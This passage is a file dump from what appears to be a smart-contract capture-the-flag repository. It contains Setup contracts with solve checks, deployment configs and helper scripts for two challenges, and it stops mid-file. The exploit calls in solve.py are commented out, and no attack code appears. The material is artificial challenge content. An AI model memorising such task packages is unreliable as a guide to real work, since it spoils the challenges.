-------------------------------------------------------------------------------- https://raw.githubusercontent.com/sherlock-protocol/sherlock-ctf-0x0/fd78069318b28c244429b1dc1f55245bdac66e7a/plotchy/HouseOfMirrorsCallMap.ods -------------------------------------------------------------------------------- /plotchy/brownie-config.yaml: -------------------------------------------------------------------------------- 1 | dotenv: .env 2 | wallets: 3 | from_key: ${PRIVATE_KEY} 4 | networks: 5 | default: development 6 | goerli: 7 | verify: True -------------------------------------------------------------------------------- /plotchy/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | //SPDX-License-Identifier: MIT 2 | pragma solidity 0.8.11; 3 | 4 | interface ISetup { 5 | event Deployed(address instance); 6 | 7 | function isSolved() external view returns (bool); 8 | } -------------------------------------------------------------------------------- /plotchy/contracts/Setup.sol: -------------------------------------------------------------------------------- 1 | //SPDX-License-Identifier: MIT 2 | pragma solidity 0.8.11; 3 | 4 | import './ISetup.sol'; 5 | import './AmusementPark.sol'; 6 | 7 | contract Setup is ISetup { 8 | AmusementPark public instance; 9 | 10 | constructor() { 11 | instance = new AmusementPark(); 12 | emit Deployed(address(instance)); 13 | } 14 | 15 | function isSolved() external override view returns (bool) { 16 | return instance.BigSmile(); 17 | } 18 | } -------------------------------------------------------------------------------- /plotchy/scripts/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sherlock-protocol/sherlock-ctf-0x0/fd78069318b28c244429b1dc1f55245bdac66e7a/plotchy/scripts/__init__.py -------------------------------------------------------------------------------- /plotchy/scripts/helpful_scripts.py: -------------------------------------------------------------------------------- 1 | from brownie import ( 2 | network, 3 | accounts, 4 | config, 5 | Contract, 6 | ) 7 | from web3 import Web3 8 | import sys 9 | from dotenv import dotenv_values 10 | sys.path.insert(1, dotenv_values(".env")["CRYPTO_TOOLS_PATH"]) 11 | import enc 12 | 13 | NON_FORKED_LOCAL_BLOCKCHAIN_ENVIRONMENTS = ["hardhat", "development", "ganache"] 14 | LOCAL_BLOCKCHAIN_ENVIRONMENTS = NON_FORKED_LOCAL_BLOCKCHAIN_ENVIRONMENTS + [ 15 | "mainnet-fork", 16 | "binance-fork", 17 | "matic-fork", 18 | ] 19 | DECIMALS = 18 20 | 21 | def get_account(index=None, id=None): 22 | if index: 23 | return accounts[index] 24 | # if network.show_active() in LOCAL_BLOCKCHAIN_ENVIRONMENTS: 25 | # return accounts[0] 26 | if id: 27 | return accounts.load(id) 28 | 29 | publicKey, privateKey = enc.run_decryption() 30 | return accounts.add(privateKey) 31 | 32 | 33 | def padHexTo32Bytes(input, side): 34 | # print(input, len(input)) 35 | if 'upper' in side.lower() or 'left' in side.lower(): 36 | return "0" * (64 - (len(input) % 64)) + input 37 | elif 'lower' in side.lower() or 'right' in side.lower(): 38 | return input + "0" * (64 - (len(input) % 64)) 39 | -------------------------------------------------------------------------------- /plotchy/scripts/solve.py: -------------------------------------------------------------------------------- 1 | from web3 import Web3 2 | from brownie import ( 3 | network, 4 | accounts, 5 | config, 6 | Contract, 7 | AmusementPark, 8 | Exploit, 9 | Setup 10 | ) 11 | from web3 import Web3 12 | import sys 13 | from dotenv import dotenv_values 14 | PROJECT_SCRIPTS_PATH = dotenv_values(".env")["CTF_PROJECT_PATH"] + "/scripts/" 15 | PROJECT_BUILD_PATH = dotenv_values(".env")["CTF_PROJECT_PATH"] + "/build/" 16 | sys.path.insert(1, PROJECT_SCRIPTS_PATH) 17 | from helpful_scripts import get_account 18 | 19 | 20 | def deploy_contracts(): 21 | # setup = Setup.deploy({"from": get_account()}) 22 | setup = Setup.deploy({"from": get_account()}, publish_source=True) 23 | print(setup.instance()) 24 | print(setup.isSolved()) 25 | # exploit = Exploit.deploy(setup.instance(), {"from": get_account()}) 26 | # finalize_tx = exploit.finalize({"from": get_account()}) 27 | # print(finalize_tx.info()) 28 | # print(setup.isSolved()) 29 | 30 | def main(): 31 | deploy_contracts() 32 | 33 | if __name__ == '__main__': 34 | main() -------------------------------------------------------------------------------- /plotchy/tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sherlock-protocol/sherlock-ctf-0x0/fd78069318b28c244429b1dc1f55245bdac66e7a/plotchy/tests/__init__.py -------------------------------------------------------------------------------- /saianmk/.gitignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | .env 3 | coverage 4 | coverage.json 5 | typechain 6 | 7 | #Hardhat files 8 | cache 9 | artifacts 10 | node_modules 11 | -------------------------------------------------------------------------------- /saianmk/README.md: -------------------------------------------------------------------------------- 1 | # Combination 2 | 3 | 4 | | Contract | Goerli | 5 | | ---------------------- | ---------------------------------------------------------------------------------------------------------------------------- | 6 | | Combination.sol | [0xB5193e99607e7e63B49ACC48fCe0AC7A3676e4F6](https://goerli.etherscan.io/address/0xB5193e99607e7e63B49ACC48fCe0AC7A3676e4F6) | 7 | | Setup.sol | [0xbFB2C43021629C87b83C97F1FAC8D5f6b1078593](https://goerli.etherscan.io/address/0xbFB2C43021629C87b83C97F1FAC8D5f6b1078593) | 8 | 9 | 10 | `.env` file 11 | 12 | ``` 13 | ETHERSCAN_API= 14 | INFURA_API= 15 | PRIVATE_KEY= 16 | ``` -------------------------------------------------------------------------------- /saianmk/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | //SPDX-License-Identifier: MIT 2 | 3 | pragma solidity 0.8.4; 4 | 5 | interface ISetup { 6 | event Deployed(address instance); 7 | 8 | function isSolved() external view returns (bool); 9 | } -------------------------------------------------------------------------------- /saianmk/contracts/Setup.sol: -------------------------------------------------------------------------------- 1 | //SPDX-License-Identifier: MIT 2 | 3 | pragma solidity 0.8.4; 4 | 5 | import "./ISetup.sol"; 6 | import "./Combination.sol"; 7 | 8 | contract Setup is ISetup { 9 | 10 | Combination public combination; 11 | constructor() { 12 | combination = new Combination(32,2,8,2,180); 13 | emit Deployed(address(combination)); 14 | } 15 | 16 | function isSolved() external view override returns (bool) { 17 | return combination.unlocked() == true; 18 | } 19 | } -------------------------------------------------------------------------------- /saianmk/hardhat.config.js: -------------------------------------------------------------------------------- 1 | require("@nomiclabs/hardhat-waffle"); 2 | require("@nomiclabs/hardhat-etherscan"); 3 | require('dotenv').config(); 4 | 5 | const ETHERSCAN_API=process.env.ETHERSCAN_API; 6 | const INFURA_API=process.env.INFURA_API; 7 | const PRIVATE_KEY=process.env.PRIVATE_KEY; 8 | 9 | // This is a sample Hardhat task. To learn how to create your own go to 10 | // https://hardhat.org/guides/create-task.html 11 | task("accounts", "Prints the list of accounts", async (taskArgs, hre) => { 12 | const accounts = await hre.ethers.getSigners(); 13 | 14 | for (const account of accounts) { 15 | console.log(account.address); 16 | } 17 | }); 18 | 19 | // You need to export an object to set up your config 20 | // Go to https://hardhat.org/config/ to learn more 21 | 22 | /** 23 | * @type import('hardhat/config').HardhatUserConfig 24 | */ 25 | module.exports = { 26 | solidity: "0.8.4", 27 | etherscan: { 28 | apiKey:ETHERSCAN_API, 29 | }, 30 | networks: { 31 | goerli: { 32 | url:`https://goerli.infura.io/v3/${INFURA_API}`, 33 | accounts: [`0x${PRIVATE_KEY}`], 34 | } 35 | } 36 | }; 37 | -------------------------------------------------------------------------------- /saianmk/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "combination", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "index.js", 6 | "scripts": { 7 | "test": "echo \"Error: no test specified\" && exit 1" 8 | }, 9 | "keywords": [], 10 | "author": "", 11 | "license": "ISC", 12 | "devDependencies": { 13 | "@nomiclabs/hardhat-ethers": "^2.0.5", 14 | "@nomiclabs/hardhat-etherscan": "^3.0.1", 15 | "@nomiclabs/hardhat-waffle": "^2.0.2", 16 | "chai": "^4.3.6", 17 | "ethereum-waffle": "^3.4.0", 18 | "ethers": "^5.5.4", 19 | "hardhat": "^2.8.4" 20 | }, 21 | "dependencies": { 22 | "dotenv": "^16.0.0" 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /saianmk/scripts/goerli/deploy.js: -------------------------------------------------------------------------------- 1 | // We require the Hardhat Runtime Environment explicitly here. This is optional 2 | // but useful for running the script in a standalone fashion through `node